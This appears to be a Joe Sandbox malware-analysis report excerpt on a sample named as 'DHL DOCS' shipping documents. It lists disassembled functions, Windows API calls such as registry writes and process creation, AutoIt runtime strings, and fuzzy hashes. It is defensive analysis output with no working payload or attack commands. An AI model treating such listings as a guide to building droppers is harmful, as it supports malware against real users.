RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0023C84D
RegCloseKey.ADVAPI32(?), ref: 0023C881
RegCloseKey.ADVAPI32(00000000), ref: 0023C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0023C960

Strings

REG_BINARY, xrefs: 0023C913
REG_MULTI_SZ, xrefs: 0023C6F5
REG_SZ, xrefs: 0023C644
REG_EXPAND_SZ, xrefs: 0023C5CD
REG_QWORD, xrefs: 0023C8C3
REG_DWORD, xrefs: 0023C804

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: cbcd9dc6ad038e9e56be9331f21d6970721f8468d27a413fe2dc8d34da650ebe
Instruction ID: 3191f8fc983922843e575ba1867f9aa6327a5f173dbd4b2ce052c6253787040b
Opcode Fuzzy Hash: cbcd9dc6ad038e9e56be9331f21d6970721f8468d27a413fe2dc8d34da650ebe
Instruction Fuzzy Hash: 341279752142019FC725DF24D881B6AB7E5FF88714F14889DF88AAB3A2DB31ED41CB91

Function 0024091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002409C6
_wcslen.LIBCMT ref: 00240A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00240A54
_wcslen.LIBCMT ref: 00240A8A
_wcslen.LIBCMT ref: 00240B06
_wcslen.LIBCMT ref: 00240B81

Part of subcall function 001CF9F2: _wcslen.LIBCMT ref: 001CF9FD

Part of subcall function 00212BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00212BFA

Strings

EXPAND, xrefs: 00240BF8
ISCHECKED, xrefs: 00240CE1
GETSELECTED, xrefs: 00240C4E
SELECT, xrefs: 00240D11
EXISTS, xrefs: 00240B7C, 00240B97
COLLAPSE, xrefs: 00240B01, 00240B1C
GETTEXT, xrefs: 00240C97
GETITEMCOUNT, xrefs: 00240C1E
UNCHECK, xrefs: 00240D3E
CHECK, xrefs: 00240A85, 00240AA0
GETTOTALCOUNT, xrefs: 002409F2, 00240A17

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: d7e9c8074f480f4ad95f608280d27ec3ae1c3bb213d75719d1fc32630ad363b7
Instruction ID: ff3289be5f324cb407e500faf7a3525a23ea0c7072bc8db33269e0d0bb1484b5
Opcode Fuzzy Hash: d7e9c8074f480f4ad95f608280d27ec3ae1c3bb213d75719d1fc32630ad363b7
Instruction Fuzzy Hash: 7CE19031228702CFC718DF25C49196AB7E1FFA8318B14895DF9969B3A2D730ED95CB81

Function 0023C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0023B6AE,?,?), ref: 0023C9B5
_wcslen.LIBCMT ref: 0023C9F1
_wcslen.LIBCMT ref: 0023CA68
_wcslen.LIBCMT ref: 0023CA9E
_wcslen.LIBCMT ref: 0023CAF9
_wcslen.LIBCMT ref: 0023CB2F
_wcslen.LIBCMT ref: 0023CB7F

Strings

HKEY_CURRENT_CONFIG, xrefs: 0023CB79, 0023CB7E
HKEY_CURRENT_USER, xrefs: 0023CBBD
HKCR, xrefs: 0023CB29, 0023CB2E
HKEY_CLASSES_ROOT, xrefs: 0023CAF3, 0023CAF8
HKEY_LOCAL_MACHINE, xrefs: 0023CA62, 0023CA67
HKEY_USERS, xrefs: 0023CBDF
HKU, xrefs: 0023CBF0
HKLM, xrefs: 0023CA98, 0023CA9D
HKCC, xrefs: 0023CBAC
HKCU, xrefs: 0023CBCE

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: f57e469b364f0f11036e18846a9ca35a52a1e6fac696e33da2458975cb492abd
Instruction ID: f863c96155db8fbef13fb79996d5df50cfaa2d5bc2d068f3f732d002205cdc64
Opcode Fuzzy Hash: f57e469b364f0f11036e18846a9ca35a52a1e6fac696e33da2458975cb492abd
Instruction Fuzzy Hash: 9F71E2B263012B8BCB20DE6CCD515BE7396AB70758F314529F856B7284EB31CD65C3A0

Function 0024833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0024835A
_wcslen.LIBCMT ref: 0024836E
_wcslen.LIBCMT ref: 00248391
_wcslen.LIBCMT ref: 002483B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002483F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0024361A,?), ref: 0024844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00248487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002484CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00248501
FreeLibrary.KERNEL32(?), ref: 0024850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0024851D
DestroyIcon.USER32(?), ref: 0024852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00248549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00248555

Strings

.exe, xrefs: 00248388
.icl, xrefs: 00248368
.dll, xrefs: 002483AB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: d6329d4a685f7e9fa46cc4f314426d0caf0af2fcd30e4be36549d8f922bd1fb0
Instruction ID: 3d86fa4ac5e74ab2a9d74534d540c6f87d0bd264d2f8d40a1d0ac63f7c816c64
Opcode Fuzzy Hash: d6329d4a685f7e9fa46cc4f314426d0caf0af2fcd30e4be36549d8f922bd1fb0
Instruction Fuzzy Hash: 2E610571920216BFEB18CF64DC85BBE77ACBF08710F104509F815DA1D1DBB499A0CBA0

Function 001B7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#ce, xrefs: 001B78ED
#comments-end, xrefs: 001B78D9
Unterminated group of comments, xrefs: 001F528C
Bad directive syntax error, xrefs: 001F519A
#OnAutoItStartRegister, xrefs: 001B7817
Cannot parse #include, xrefs: 001F5279
', xrefs: 001F5169
#requireadmin, xrefs: 001B77FF
#notrayicon, xrefs: 001B77E7
", xrefs: 001F5153
#comments-start, xrefs: 001B785F, 001B78B1
#include-once, xrefs: 001B782F
#include, xrefs: 001B7847
#cs, xrefs: 001B7873, 001B78C5
#pragma compile, xrefs: 001B77D3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 028af518dec1820c8bf714964d984aefdaeb9b675c3bad9dabe2a4090432b332
Instruction ID: a70f28ea29c76758f53dd9e37cc4541ac1b111cad1942b557d66b3bc147c3503
Opcode Fuzzy Hash: 028af518dec1820c8bf714964d984aefdaeb9b675c3bad9dabe2a4090432b332
Instruction Fuzzy Hash: E5812971604609BBDB24BF60DC46FFE37A9AFA5300F054025FA05AB1D6EB70D912DB91

Function 00215A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00215A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00215A40
SetWindowTextW.USER32(?,?), ref: 00215A57
GetDlgItem.USER32(?,000003EA), ref: 00215A6C
SetWindowTextW.USER32(00000000,?), ref: 00215A72
GetDlgItem.USER32(?,000003E9), ref: 00215A82
SetWindowTextW.USER32(00000000,?), ref: 00215A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00215AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00215AC3
GetWindowRect.USER32(?,?), ref: 00215ACC
_wcslen.LIBCMT ref: 00215B33
SetWindowTextW.USER32(?,?), ref: 00215B6F
GetDesktopWindow.USER32 ref: 00215B75
GetWindowRect.USER32(00000000), ref: 00215B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00215BD3
GetClientRect.USER32(?,?), ref: 00215BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00215C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00215C2F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 3bc292fdb6c4aa1ad6d6e92087591a82ba2297885469015de63ba97369d7d3e3
Instruction ID: cafc013e1e4d4c1721260d12b6f0905ec29dac560a21e513877eef58a1d34880
Opcode Fuzzy Hash: 3bc292fdb6c4aa1ad6d6e92087591a82ba2297885469015de63ba97369d7d3e3
Instruction Fuzzy Hash: 2871A031910B1AEFCB20DFA8CD89AAEBBF5FF98704F104558E142A21A4D775E990CF50

Function 002130F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0021318D
_wcslen.LIBCMT ref: 002131F8

Strings

[', xrefs: 0021339A
NAME, xrefs: 00213335, 00213346
CLASS, xrefs: 00213188, 002131A5
CLASSNN, xrefs: 002131F3, 00213204
REGEXPCLASS, xrefs: 00213255, 00213266
TEXT, xrefs: 0021347C
INSTANCE, xrefs: 00213453

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$['
API String ID: 176396367-1161093653
Opcode ID: 605a1aa2824888cfc11107a862e9890e62f9cd835430cabace3d8e4f548c2a57
Instruction ID: bedc71f2379769c7d5acb46b9ff1f6749f869e1fc8798f31b8e4a07b05508112
Opcode Fuzzy Hash: 605a1aa2824888cfc11107a862e9890e62f9cd835430cabace3d8e4f548c2a57
Instruction Fuzzy Hash: 39E1F532A20516ABCB18DF68C4516EDFBF6BF34710F54812AE456E7240DB70AEE5C790

Function 0024911E Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

DragQueryPoint.SHELL32(?,?), ref: 00249147

Part of subcall function 00247674: ClientToScreen.USER32(?,?), ref: 0024769A
Part of subcall function 00247674: GetWindowRect.USER32(?,?), ref: 00247710
Part of subcall function 00247674: PtInRect.USER32(?,?,00248B89), ref: 00247720

SendMessageW.USER32(?,000000B0,?,?), ref: 002491B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002491BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002491DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00249225
SendMessageW.USER32(?,000000B0,?,?), ref: 0024923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00249255
SendMessageW.USER32(?,000000B1,?,?), ref: 00249277
DragFinish.SHELL32(?), ref: 0024927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00249371

Strings

p#(, xrefs: 002492BB
8], xrefs: 0024917D, 002491EA
@GUI_DRAGID, xrefs: 002492E9
@GUI_DROPID, xrefs: 0024929E
@GUI_DRAGFILE, xrefs: 00249320

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: 8]$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#(
API String ID: 221274066-3428501978
Opcode ID: a38a582f323dbd0bcf9c1852981fc93af1861a79e002e53ce98b1f65d4587be5
Instruction ID: e0d7282aa567043e954ef243a38fdd2a25194b486d3026c3009149cb718eee0d
Opcode Fuzzy Hash: a38a582f323dbd0bcf9c1852981fc93af1861a79e002e53ce98b1f65d4587be5
Instruction Fuzzy Hash: 65619871108301AFC305EF64DC89DAFBBE8EF99750F10092EF995921A0DB709A59CB92

Function 001D00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001D00C6

Part of subcall function 001D00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0028070C,00000FA0,B2533847,?,?,?,?,001F23B3,000000FF), ref: 001D011C
Part of subcall function 001D00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001F23B3,000000FF), ref: 001D0127
Part of subcall function 001D00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001F23B3,000000FF), ref: 001D0138
Part of subcall function 001D00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001D014E
Part of subcall function 001D00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001D015C
Part of subcall function 001D00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001D016A
Part of subcall function 001D00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001D0195
Part of subcall function 001D00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001D01A0

___scrt_fastfail.LIBCMT ref: 001D00E7

Part of subcall function 001D00A3: __onexit.LIBCMT ref: 001D00A9

Strings

kernel32.dll, xrefs: 001D0133
SleepConditionVariableCS, xrefs: 001D0154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 001D0122
InitializeConditionVariable, xrefs: 001D0148
WakeAllConditionVariable, xrefs: 001D0162

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 28d19ff3bf0581b2a7db9319fdc32e534db24ff48b0140a6689e018abe171379
Instruction ID: e16bc757f1e7f881b724917a1ebc8c83ba4b559205892fdde4de08e307b6ab1d
Opcode Fuzzy Hash: 28d19ff3bf0581b2a7db9319fdc32e534db24ff48b0140a6689e018abe171379
Instruction Fuzzy Hash: 52210836A46710ABE7566BA8BC4DF6A73D4EB5EB51F11013BF805E2391DB70DC008AA0

Function 002244C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0024CC08), ref: 00224527
_wcslen.LIBCMT ref: 0022453B
_wcslen.LIBCMT ref: 00224599
_wcslen.LIBCMT ref: 002245F4
_wcslen.LIBCMT ref: 0022463F
_wcslen.LIBCMT ref: 002246A7

Part of subcall function 001CF9F2: _wcslen.LIBCMT ref: 001CF9FD

GetDriveTypeW.KERNEL32(?,00276BF0,00000061), ref: 00224743

Strings

all, xrefs: 00224531, 00224536
ramdisk, xrefs: 002246F1
removable, xrefs: 002245EA, 002245EF
network, xrefs: 0022469D, 002246A2
fixed, xrefs: 00224635, 0022463A
cdrom, xrefs: 0022458F, 00224594
unknown, xrefs: 00224708

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 70165e2d176daf3390b55d9c71705ed5667f1d646c98457c72ea007213c72698
Instruction ID: 37ae94d9bbafb2168af25778fafcb330e53fca78d9c4d6c2e2b15e062e7e8716
Opcode Fuzzy Hash: 70165e2d176daf3390b55d9c71705ed5667f1d646c98457c72ea007213c72698
Instruction Fuzzy Hash: B7B13531628322AFC710EF68E890A7EB7E5BFA6724F50491DF496C7291D730D864CB52

Function 00246CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00246DEB

Part of subcall function 001B6B57: _wcslen.LIBCMT ref: 001B6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00246E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00246E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00246E94
DestroyWindow.USER32(?), ref: 00246EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001B0000,00000000), ref: 00246EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00246EFD
GetDesktopWindow.USER32 ref: 00246F16
GetWindowRect.USER32(00000000), ref: 00246F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00246F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00246F4D

Part of subcall function 001C9944: GetWindowLongW.USER32(?,000000EB), ref: 001C9952

Strings

0, xrefs: 00246D98
8], xrefs: 00246D0F, 00246DCF, 00246DF1, 00246E04
tooltips_class32, xrefs: 00246E58, 00246EDD

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$8]$tooltips_class32
API String ID: 2429346358-2524467302
Opcode ID: 491b547d539eea75553d6e7bd62aa562002aeb15ab1a08e92909f53a65ad3f88
Instruction ID: ca920b9645be6ad03f6fa36d106eafec4a8789de188294686053a8fb7a0ed36d
Opcode Fuzzy Hash: 491b547d539eea75553d6e7bd62aa562002aeb15ab1a08e92909f53a65ad3f88
Instruction Fuzzy Hash: 51716D74114341AFDB29CF18E848EA6BBE9FB8A304F14441DF99987261C771A91ACB12

Function 0023AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0023B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0023B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0023B1D4
_wcslen.LIBCMT ref: 0023B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0023B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0023B236
_wcslen.LIBCMT ref: 0023B332

Part of subcall function 002205A7: GetStdHandle.KERNEL32(000000F6), ref: 002205C6

_wcslen.LIBCMT ref: 0023B34B
_wcslen.LIBCMT ref: 0023B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0023B3B6
GetLastError.KERNEL32(00000000), ref: 0023B407
CloseHandle.KERNEL32(?), ref: 0023B439
CloseHandle.KERNEL32(00000000), ref: 0023B44A
CloseHandle.KERNEL32(00000000), ref: 0023B45C
CloseHandle.KERNEL32(00000000), ref: 0023B46E
CloseHandle.KERNEL32(?), ref: 0023B4E3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 8d7dddc2b258db0cc744560023e786f3153547996bd9ce1c88f33a9e947576b9
Instruction ID: bd1aeeb94db032d0e2f35e92cfc24bfa81c9a3411806bbda684a70d22ce380f0
Opcode Fuzzy Hash: 8d7dddc2b258db0cc744560023e786f3153547996bd9ce1c88f33a9e947576b9
Instruction Fuzzy Hash: 22F1CC716183019FC725EF24C891B6FBBE5AF85310F14855DF99A8B2A2CB31EC50CB52

Function 001B326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00281990), ref: 001F2F8D
GetMenuItemCount.USER32(00281990), ref: 001F303D
GetCursorPos.USER32(?), ref: 001F3081
SetForegroundWindow.USER32(00000000), ref: 001F308A
TrackPopupMenuEx.USER32(00281990,00000000,?,00000000,00000000,00000000), ref: 001F309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001F30A9

Strings

0, xrefs: 001B327D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
